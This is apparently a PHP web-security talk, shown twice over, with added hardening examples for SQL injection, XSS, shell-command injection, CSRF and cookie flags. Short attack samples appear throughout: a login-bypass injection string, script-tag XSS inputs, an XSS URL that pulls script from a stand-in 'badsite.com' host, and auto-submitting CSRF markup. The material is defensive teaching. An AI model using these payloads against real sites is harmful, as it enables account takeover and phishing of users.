Securing PHP Web Applications
Damon P. Cortesi, CISSP
Director @ Alchemy Security
Stats Nut | Security Geek | Builder of Tools
$ whoami
Security Consultant
Part-time Web Dev (PHP, Django, Rails)
Destroyer of Web Apps and Dual-Cores
<?=presoinfo();?>
Typical web application vulnerabilities: SQL Injection, Cross-Site Scripting
What to watch out for
How to secure your PHP apps
SQL Injection
$sql = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "' AND password = '" . $_POST['password'] . "'";
What if username is:  dpc' or 'a'='a  ?
... username = 'dpc' or 'a'='a' ...
http://www.flickr.com/photos/tekalpha/94105897/
SQL Injection
Username: dpc
SELECT * FROM users WHERE username = 'dpc' AND password = 'apassword';
Username: dpc' OR 'A'='A
SELECT * FROM users WHERE username = 'dpc' OR 'A'='A' AND password = 'apassword';
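The login query from the two slides above, written once the way the slide builds it and once as a prepared statement. This is an added example, not code from the talk; it uses an in-memory SQLite database through PDO so it runs offline, and the users table with its single row is constructed sample data (the plaintext password column only mirrors the slide's query).

```php
<?php
// Added example (not from the slides): string-built query vs. prepared statement.
// In-memory SQLite keeps it self-contained; the table and row are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT, password TEXT)');
$db->exec("INSERT INTO users VALUES ('dpc', 'apassword')");

// Vulnerable, as on the slide: the input is spliced into the SQL text, so a
// quote in the input changes the structure of the query.
function loginVulnerable(PDO $db, string $username, string $password): int
{
    $sql = "SELECT * FROM users WHERE username = '" . $username
         . "' AND password = '" . $password . "'";
    return count($db->query($sql)->fetchAll());
}

// Hardened: placeholders send the query text and the values separately, so
// the values are never parsed as SQL no matter what characters they contain.
function loginSafe(PDO $db, string $username, string $password): int
{
    $stmt = $db->prepare('SELECT * FROM users WHERE username = ? AND password = ?');
    $stmt->execute([$username, $password]);
    return count($stmt->fetchAll());
}

$username = "dpc' OR 'A'='A";   // the username from the slide
printf("concatenated, wrong password: %d row(s)\n", loginVulnerable($db, $username, 'wrong'));
printf("prepared,     wrong password: %d row(s)\n", loginSafe($db, $username, 'wrong'));
printf("prepared,     right password: %d row(s)\n", loginSafe($db, 'dpc', 'apassword'));
```

With the concatenated query the `OR 'A'='A'` clause matches the row regardless of the password; with the prepared statement the same string is compared literally against the username column and matches nothing, while a genuine username and password still match. The same `prepare()`/`execute()` pattern applies to MySQL through `PDO` or `mysqli`, which is what the later "Better?" slide is pointing at.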
Cross-Site Scripting
User input re-displayed in the browser and interpreted as HTML or... JavaScript
My name is Damon"><script>alert('hi')</script>
Why is this bad? Phishing, cookie stealing, arbitrary JavaScript execution...
XSS Example
Ability to spoof an entire site by including JavaScript from elsewhere
http://realsite.com/projects/search?q=test"><script src="http://badsite.com/evilphishingpage.js"></script>...
JavaScript can rewrite any DOM element...
Real-world Dangers
We live in an interactive web
So what?
I run a blog... XSS me all day long... I DON'T CARE!
Fair enough. Importance of security is directly proportional to level of risk.
Blog != Payment Gateway.
Coder for Hire?
Are you willing to put your company reputation at stake?
What type of apps are you building? Where _might_ your code be used? Themes? Plugins?
include('wp_story');
Common Mitigations
"Increase your security by 80%, by fixing 20% of the problems."
Input Sanitization and Validation
Data Encoding and Escaping
Sanitization/Encoding
SQL: mysql_real_escape_string()
HTML/XSS: htmlentities()
"<b>Damon</b>  >>  &quot;&lt;b&gt;Damon&lt;/b&gt;
Beware encoding
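The output-encoding step from this slide and the XSS slides before it, shown on the search-term example those slides use. This is an added example, not code from the talk; the `$q` value is constructed sample input, and `e()` is a helper name chosen here.

```php
<?php
// Added example (not from the slides): re-displaying user input raw vs. encoded.
// The helper name e() and the sample input are constructed for this example.

// One encoder for HTML body text and quoted attribute values.
// ENT_QUOTES encodes both " and ' (htmlentities() before PHP 8.1 left ' alone
// by default), ENT_SUBSTITUTE replaces invalid byte sequences instead of
// returning an empty string, and the explicit charset is the "beware
// encoding" point: the encoder must agree with the charset the page declares.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable: the input closes the value attribute and the <input> tag and
// the rest of it is parsed as markup.
function renderVulnerable(string $q): string
{
    return '<input name="q" value="' . $q . '">';
}

// Hardened: quotes and angle brackets become entities, so the whole input
// stays inside the attribute value and is displayed as text.
function renderSafe(string $q): string
{
    return '<input name="q" value="' . e($q) . '">';
}

$q = 'Damon"><script>alert(\'hi\')</script>';   // the input from the XSS slide
echo renderVulnerable($q), "\n";
echo renderSafe($q), "\n";

// The slide's htmlentities() example goes through the same function.
echo e('"<b>Damon</b>'), "\n";
```

The encoder is only correct for the contexts it is written for: HTML text and double- or single-quoted attributes. An unquoted attribute, a URL, or a JavaScript string literal each need their own escaping, which is the reason the later slide recommends an output library that escapes automatically rather than hand-placed calls.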
Input Sanitization Fail
exec(mysql_escape_string($_GET['var']))
Problem #1: mysql_escape_string() is deprecated.
Problem #2: MySQL escaping does not make a string safe for exec().
??  preg_match("/.jpe?g$/i", $var)
exec("convert '" . mysql_escape_string($path) . "' /tmp/'" . mysql_escape_string(basename($path)) . "'.png");
Better?
Instead of dynamically constructing SQL queries... use a framework: CodeIgniter, CakePHP, Zend.
Or build a db.inc.php (but not a db.inc: a file the web server does not hand to PHP can be served as plain text, credentials included).
Use an output library that automatically escapes.
Server-Side Checks
Client-side code can be modified: HTTP proxies, toolbars, super-hack "save to disk" & modify
Validate all user input with server-side code
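A server-side rebuild of the convert command from the "Input Sanitization Fail" slide, covering that slide and the "Server-Side Checks" rule above it: the file name is validated against an allow-list on the server and the command is escaped with `escapeshellarg()`, the escaping a shell actually needs, instead of `mysql_escape_string()`. This is an added example, not the talk's code; `UPLOAD_DIR` and the sample file names are constructed, and the command is only built and printed, never executed.

```php
<?php
// Added example (not from the slides): allow-list validation plus shell escaping
// for the convert command. UPLOAD_DIR and the sample names are constructed;
// nothing here runs a command.
const UPLOAD_DIR = '/var/www/uploads';   // assumed location of uploaded images

// Validate the *shape* of the name server-side: letters, digits, underscore,
// hyphen, then a .jpg/.jpeg extension. basename() drops any directory part
// the client sent, and the anchored pattern (with the dot escaped, which the
// slide's pattern lacked) rejects everything else, quotes and spaces included.
function validatedImagePath(string $userSupplied): ?string
{
    $name = basename($userSupplied);
    if (!preg_match('/^[A-Za-z0-9_-]+\.jpe?g$/i', $name)) {
        return null;
    }
    return UPLOAD_DIR . '/' . $name;
}

// escapeshellarg() wraps each argument in single quotes and escapes any
// embedded single quote, so each value stays one argument to convert.
// mysql_escape_string() targets a different parser and gives no such guarantee.
function buildConvertCommand(string $imagePath): string
{
    $pngPath = '/tmp/' . pathinfo($imagePath, PATHINFO_FILENAME) . '.png';
    return 'convert ' . escapeshellarg($imagePath) . ' ' . escapeshellarg($pngPath);
}

foreach (['holiday.jpg', 'holiday.jpeg', "O'Brien photo.jpg", 'notes.txt', '../other.jpg'] as $input) {
    $path = validatedImagePath($input);
    echo $path === null
        ? "rejected: $input\n"
        : "ok:       " . buildConvertCommand($path) . "\n";
}

// Defence in depth: even a name containing a quote stays a single shell
// argument once escapeshellarg() has handled it.
echo escapeshellarg("O'Brien.jpg"), "\n";
```

The two layers do different jobs: validation decides which inputs the application accepts at all, and escaping makes sure that whatever is accepted is passed to the shell as data. `../other.jpg` is accepted only after `basename()` has reduced it to `other.jpg` under `UPLOAD_DIR`, so the client cannot steer the command outside that directory.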
Bug Hunting
Data Inputs: $_GET, $_POST, $_REQUEST, $_SERVER['QUERY_STRING'], $_SERVER['PHP_SELF'], $_COOKIE
Shell commands: exec()
Cross-Site Request Forgery
Let's Google for "javascript are you sure?"
First result (circa 2006) is susceptible to CSRF (and probably SQL Injection).
What is this CSRF?
GET CSRF
delete.php?id=123
An action that modifies data, called via HTTP GET (against the HTTP spec).
<img src="http://x.com/delete.php?id=123" />
POST CSRF
Only difference: JavaScript required to automate the attack.
<form name="csrf" action="http://x.com/delete.php" method="POST">
<input type="hidden" name="id" value="123">
</form>
<script>document.csrf.submit()</script>
CSRF in Action
Fixing CSRF
Do not modify data using GET
Use tokens on all form POSTs: per-session, per-form
Up to you - convenience vs. security
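Both fixes from this slide applied to the delete.php action from the CSRF slides: the handler refuses anything but POST, and the POST must carry a token that was issued for that form in the caller's session. This is an added example, not the talk's code; so that it runs from the command line, a plain array stands in for `$_SESSION` (a real application calls `session_start()` and uses `$_SESSION`), and the form name and request arrays are constructed.

```php
<?php
// Added example (not from the slides): per-form CSRF tokens for delete.php.
// $session is a plain array standing in for $_SESSION; form names and the
// sample requests are constructed.

// Issue one unguessable token per form and keep it for the session.
// random_bytes() is a CSPRNG; rand()/uniqid() would not do here.
function issueToken(array &$session, string $form): string
{
    if (empty($session['csrf'][$form])) {
        $session['csrf'][$form] = bin2hex(random_bytes(32));
    }
    return $session['csrf'][$form];
}

// The hidden field to drop into the form that submits to delete.php.
function hiddenField(array &$session, string $form): string
{
    $token = issueToken($session, $form);
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '">';
}

// True only for a POST carrying the token issued for this form.
function requestIsAuthorized(array $session, string $form, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;                       // data-changing actions never run from GET
    }
    $expected = $session['csrf'][$form] ?? '';
    $given    = $post['csrf_token'] ?? '';
    // is_string() guards against csrf_token[]=... arriving as an array;
    // hash_equals() compares in constant time.
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

$session = [];
echo hiddenField($session, 'delete'), "\n";
$token = $session['csrf']['delete'];

$cases = [
    'GET with id only'      => ['GET',  ['id' => '123']],
    'POST without token'    => ['POST', ['id' => '123']],
    'POST with wrong token' => ['POST', ['id' => '123', 'csrf_token' => str_repeat('0', 64)]],
    'POST with issued token'=> ['POST', ['id' => '123', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-23s %s\n", $label,
        requestIsAuthorized($session, 'delete', $method, $post) ? 'allowed' : 'rejected');
}
```

Only the last case is allowed. The `<img>` and auto-submitted `<form>` from the earlier slides fail because the attacking page cannot read the victim's session and so cannot supply the token; the per-form key is the "per-form" option from the slide, and dropping the `$form` key gives the simpler per-session variant.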
Other Protections
Secure Cookie Flag: restricts transmission of the cookie to HTTPS connections
HTTPOnly Cookie Flag: can't be accessed using <script>
Use innerText, not innerHTML
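How the two cookie flags from this slide are set from PHP, for the session cookie and for an application cookie. This is an added example, not the talk's code; it needs PHP 7.3 or later for the options-array form of both calls, the cookie name and value are constructed, and the `samesite` attribute is included as a related flag the slide does not mention.

```php
<?php
// Added example (not from the slides): Secure and HttpOnly on PHP cookies.
// Requires PHP 7.3+ for the options-array signatures; 'remember' and its
// value are constructed sample data.

// Session cookie: the parameters must be set before session_start().
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,    // only sent over HTTPS
    'httponly' => true,    // not readable from <script>
    'samesite' => 'Lax',   // not on the slide: also limits cross-site submission
]);
session_start();

// An application cookie with the same flags.
setcookie('remember', 'opaque-token-value', [
    'expires'  => time() + 86400 * 30,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);
```

The session flags can equally be fixed in php.ini with `session.cookie_secure = 1` and `session.cookie_httponly = 1`, which removes the dependency on every entry point calling `session_set_cookie_params()` first.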
3rd Party Plugins
Need a plugin or specific function? Google. Download. Hackhack. It works!
Is that code secure? (See prev. CSRF)
Server Config
Not always some über-technical sploit...
/phpMyAdmin unprotected? demo/demo password
Email on confirmation page
Location: $references
Chris Shiflett: http://shiflett.org/ (Essential PHP Security)
PHP Manual: http://www.php.net/manual/en/security.php
Disable register_globals (disabled by default in PHP > 4.2.0)
http://www.owasp.org/index.php/PHP_Top_5
http://startupsecurity.info
Thanks [email_address] http://xkcd.com/327/
PHPUG Presentation

  • 1. Securing PHP Web Applications
    Damon P. Cortesi, CISSP
    Director @ Alchemy Security
    Stats Nut | Security Geek | Builder of Tools
  • 2. $ whoami
    Security Consultant
    Part-time Web Dev (PHP, Django, Rails)
    Destroyer of Web Apps and Dual-Cores
  • 3. <?=presoinfo();?>
    Typical web application vulnerabilities: SQL Injection, Cross-Site Scripting
    What to watch out for
    How to secure your PHP apps
  • 4. SQL Injection
    $sql = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "' AND password = '" . $_POST['password'] . "'";
    What if username is: dpc' or 'a'='a ?
    ... username = 'dpc' or 'a'='a' ...
  • 6. SQL Injection
    Username: dpc
    SELECT * FROM users WHERE username = 'dpc' AND password = 'apassword';
    Username: dpc' OR 'A'='A
    SELECT * FROM users WHERE username = 'dpc' OR 'A'='A' AND password = 'apassword';
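The query from slides 4 and 6, run both ways, as an added example that is not part of the slide deck: the concatenated string next to a PDO prepared statement, against an in-memory SQLite database so it executes offline. The users table, the single sample row and the function names are assumptions made for this demonstration.

```php
<?php
declare(strict_types=1);
// Added example (not from the slides): vulnerable string concatenation vs. a
// PDO prepared statement. The table, the constructed user row and the helper
// names are assumptions for this demonstration.

function setupDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (username TEXT, password TEXT)');
    // Constructed sample row; a real app stores a password hash, not plaintext.
    $db->exec("INSERT INTO users VALUES ('dpc', 'apassword')");
    return $db;
}

// Vulnerable (slide 4): user input becomes part of the SQL text, so a quote
// in the username ends the literal and the rest is parsed as SQL.
function loginVulnerable(PDO $db, string $username, string $password): int
{
    $sql = "SELECT * FROM users WHERE username = '" . $username
         . "' AND password = '" . $password . "'";
    return count($db->query($sql)->fetchAll(PDO::FETCH_ASSOC));
}

// Fixed: the statement is parsed once with placeholders; the input arrives
// only as bound values, so quotes in it can never change the query structure.
function loginPrepared(PDO $db, string $username, string $password): int
{
    $stmt = $db->prepare(
        'SELECT * FROM users WHERE username = :u AND password = :p'
    );
    $stmt->execute([':u' => $username, ':p' => $password]);
    return count($stmt->fetchAll(PDO::FETCH_ASSOC));
}

$db = setupDb();
$payload = "dpc' OR 'A'='A";     // the injected username from slide 6
$wrongPassword = 'not-the-password';

printf("vulnerable: %d row(s)\n", loginVulnerable($db, $payload, $wrongPassword));
printf("prepared:   %d row(s)\n", loginPrepared($db, $payload, $wrongPassword));
```

With the wrong password, the concatenated query still returns the dpc row: AND binds tighter than OR, so the WHERE clause becomes `username = 'dpc' OR ('A'='A' AND password = ...)`, and the first disjunct alone is true. The prepared statement looks for a user literally named `dpc' OR 'A'='A` and returns nothing.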
  • 7. Cross-Site Scripting
    User input re-displayed in browser and interpreted as HTML or ... JavaScript
    My name is Damon"><script>alert('hi')</script>
    Why is this bad? Phishing, cookie stealing, arbitrary JavaScript execution...
  • 8. XSS Example
    Ability to spoof an entire site by including JavaScript from elsewhere:
    http://realsite.com/projects/search?q=test"><script src="http://badsite.com/evilphishingpage.js"></script>...
    JavaScript can rewrite any DOM element...
  • 9. Real-world Dangers
    We live in an interactive web
  • 10. So what?
    I run a blog ... XSS me all day long ... I DON'T CARE!
    Fair enough. Importance of security is directly proportional to level of risk. Blog != Payment Gateway.
  • 11. Coder for Hire?
    Are you willing to put your company reputation at stake?
    What type of apps are you building? Where _might_ your code be used? Themes? Plugins?
    include('wp_story');
  • 12. Common Mitigations
    "Increase your security by 80%, by fixing 20% of the problems."
    Input Sanitization and Validation
    Data Encoding and Escaping
  • 13. Sanitization/Encoding
    SQL: mysql_real_escape_string()
    HTML/XSS: htmlentities()
    "<b>Damon</b> >> &quot;&lt;b&gt;Damon&lt;/b&gt;
    Beware encoding
  • 14. Input Sanitization Fail
    exec(mysql_escape_string($_GET['var']))
    Problem #1: mysql_escape_string is deprecated.
    Problem #2: MySQL escape does not make it safe for exec().
    ??
    preg_match("/.jpe?g$/i", $var)
    exec("convert '" . mysql_escape_string($path) . "' /tmp/'" . mysql_escape_string(basename($path)) . "'.png");
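Slides 7, 8, 13 and 14 make one point together: escaping is specific to the output context, and a MySQL escape function protects neither an HTML page nor a shell command. The following is an added example, not code from the slides: HTML output encoding with htmlspecialchars(), an allow-list check of the filename before it reaches the shell (slide 16's server-side validation), and escapeshellarg() for the command itself. The function names, the regex and the sample inputs are constructed for this demonstration; the command is returned as a string rather than passed to exec() so the script has no side effects.

```php
<?php
declare(strict_types=1);
// Added example (not from the slides). Function names, the allow-list regex
// and the sample payloads are constructed for this demonstration.

// HTML body/attribute context (slides 7, 8, 13). ENT_QUOTES also encodes the
// single quote, so the result is safe inside both "..." and '...' attributes.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderName(string $name): string
{
    return '<input type="text" name="name" value="' . h($name) . '">';
}

// Server-side allow-list validation (slide 16): accept only a plain base name
// ending in .jpg/.jpeg. Unlike the slide-14 regex, the dot is escaped and the
// whole value is anchored, so path separators and shell metacharacters never pass.
function isValidImageName(string $name): bool
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}\.jpe?g$/i', $name) === 1;
}

// Shell context: escapeshellarg() wraps the value in single quotes and escapes
// any embedded quotes, which is what mysql_escape_string() on slide 14 does not do.
function buildConvertCommand(string $imageName): string
{
    if (!isValidImageName($imageName)) {
        throw new InvalidArgumentException('rejected image name');
    }
    $src = escapeshellarg($imageName);
    $dst = escapeshellarg('/tmp/' . basename($imageName) . '.png');
    return 'convert ' . $src . ' ' . $dst;
}

$xssPayload = 'Damon"><script>alert(\'hi\')</script>';   // the slide 7 input
echo renderName($xssPayload), "\n";                      // markup is inert text

echo buildConvertCommand('photo.jpg'), "\n";

$shellPayload = "a.jpg'; echo injected; echo '";         // constructed sample
try {
    buildConvertCommand($shellPayload);                  // fails the allow-list
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
// Even without the allow-list, escapeshellarg() keeps it a single argument:
echo escapeshellarg($shellPayload), "\n";
```

The validation layer and the escaping layer are both kept on purpose: the allow-list rejects anything that should never reach the command, and escapeshellarg() is the defence that still holds if a later change loosens the allow-list.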
  • 15. Better?
    Instead of dynamically constructing SQL queries... use a framework: CodeIgniter, CakePHP, Zend
    Or build a db.inc.php (but not a db.inc).
    Use an output library that automatically escapes.
  • 16. Server-Side Checks
    Client-side code can be modified: HTTP proxies, toolbars, super-hack "save to disk" & modify
    Validate all user input with server-side code
  • 17. Bug Hunting
    Data inputs: $_GET, $_POST, $_REQUEST, $_SERVER['QUERY_STRING'], $_SERVER['PHP_SELF'], $_COOKIE
    Shell commands: exec()
  • 18. Cross-Site Request Forgery
    Let's Google for "javascript are you sure?"
    First result (circa 2006) is susceptible to CSRF (and probably SQL Injection).
    What is this CSRF?
  • 19. GET CSRF
    delete.php?id=123
    An action that modifies data called via HTTP GET (against HTTP specs).
    <img src="http://x.com/delete.php?id=123" />
  • 20. POST CSRF
    Only difference: JavaScript required to automate attack.
    <form name="csrf" action="http://x.com/delete.php" method="POST">
    <input type="hidden" name="id" value="123">
    </form>
    <script>document.csrf.submit()</script>
  • 22. Fixing CSRF
    Do not modify data using GET
    Use tokens on all form POSTs: per-session, per-form
    Up to you - convenience vs. security
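The two fixes from slide 22, refusing GET for data-modifying actions and requiring a per-session, per-form token, applied to the delete.php handler from slides 19 and 20. This is an added example and not the speaker's code; the session array is passed in by reference so it runs without session_start() (a real app passes $_SESSION), and the key names, form name and simulated requests are assumptions made for the demonstration.

```php
<?php
declare(strict_types=1);
// Added example (not from the slides): per-session, per-form anti-CSRF tokens.
// CSRF_KEY, the form name 'delete' and the simulated requests are assumptions.

const CSRF_KEY = 'csrf_tokens';

// Create (or reuse) the token for one named form within the caller's session.
function csrfToken(array &$session, string $form): string
{
    if (!isset($session[CSRF_KEY][$form])) {
        $session[CSRF_KEY][$form] = bin2hex(random_bytes(32)); // 256 bits from a CSPRNG
    }
    return $session[CSRF_KEY][$form];
}

// Hidden field to add to the legitimate form; the attacker's form on slide 20
// cannot include it because the token lives only in the victim's session.
function csrfField(array &$session, string $form): string
{
    $t = htmlspecialchars(csrfToken($session, $form), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $t . '">';
}

// Constant-time comparison, and the token is consumed after one use so a
// value captured from a page cannot be replayed.
function csrfVerify(array &$session, string $form, ?string $submitted): bool
{
    $expected = $session[CSRF_KEY][$form] ?? null;
    if ($expected === null || $submitted === null) {
        return false;
    }
    $ok = hash_equals($expected, $submitted);
    unset($session[CSRF_KEY][$form]);
    return $ok;
}

// delete.php (slide 19): modifies data only on a POST that carries a valid token.
function handleDelete(array &$session, string $method, array $post): string
{
    if ($method !== 'POST') {
        return '405 use POST';                      // slide 22: never modify data on GET
    }
    if (!csrfVerify($session, 'delete', $post['csrf_token'] ?? null)) {
        return '403 bad or missing CSRF token';
    }
    return '200 deleted id ' . (int)($post['id'] ?? 0);
}

// Simulated session and requests (constructed for the demo).
$session = [];
echo csrfField($session, 'delete'), "\n";

$legit  = ['id' => '123', 'csrf_token' => csrfToken($session, 'delete')];
$forged = ['id' => '123'];                          // slide 20's form: no token

echo handleDelete($session, 'POST', $legit), "\n";  // passes
echo handleDelete($session, 'POST', $forged), "\n"; // rejected: no token
echo handleDelete($session, 'GET', ['id' => '123']), "\n"; // rejected: GET
```

Per-form tokens are the stricter option the slide mentions; a single per-session token is the convenience trade-off it leaves to the reader, and this code reduces to that by passing the same form name everywhere.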
  • 23. Other Protections
    Secure Cookie Flag: restricts transmission of the cookie to HTTPS connections
    HttpOnly Cookie Flag: can't be accessed using <script>
    Use innerText, not innerHTML
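Applying the two cookie flags from slide 23 in PHP, as an added example that is not from the slides: the array form of session_set_cookie_params() and setcookie() (available since PHP 7.3) sets both flags on the session cookie and on an application cookie. The cookie name and value are constructed for the demonstration, and the SameSite attribute is included as a current addition the slides predate.

```php
<?php
declare(strict_types=1);
// Added example (not from the slides): Secure and HttpOnly on the PHP session
// cookie and on an application cookie. Cookie name/value are constructed.

// Must run before session_start(). Secure: the browser sends the session id
// only over HTTPS. HttpOnly: document.cookie and injected <script> cannot read
// it, which blunts the cookie-stealing XSS from slide 7.
function hardenSessionCookie(): array
{
    session_set_cookie_params([
        'lifetime' => 0,        // browser-session cookie
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,     // Secure flag
        'httponly' => true,     // HttpOnly flag
        'samesite' => 'Lax',    // not on the slides; also limits cross-site sends
    ]);
    return session_get_cookie_params();
}

// The same flags on any cookie the application sets itself. Compare with the
// weak form, setcookie($name, $value), which sets neither flag.
function setHardenedCookie(string $name, string $value, int $ttlSeconds): bool
{
    return setcookie($name, $value, [
        'expires'  => time() + $ttlSeconds,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

print_r(hardenSessionCookie());
var_dump(setHardenedCookie('remember_me', bin2hex(random_bytes(16)), 3600));
```

Check the result in the browser's cookie inspector or with curl -i: the Set-Cookie header for PHPSESSID should carry both `Secure` and `HttpOnly`.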
  • 24. 3rd Party Plugins
    Need a plugin or specific function? Google. Download. Hackhack. It works!
    Is that code secure? (See prev. CSRF)
  • 25. Server Config
    Not always some über-technical sploit...
    /phpMyAdmin unprotected?
    demo/demo password
    Email on confirmation page
  • 26. Location: $references
    Chris Shiflett: http://shiflett.org/ (Essential PHP Security)
    PHP Manual: http://www.php.net/manual/en/security.php
    Disable register_globals (disabled by default in PHP > 4.2.0)
    http://www.owasp.org/index.php/PHP_Top_5
    http://startupsecurity.info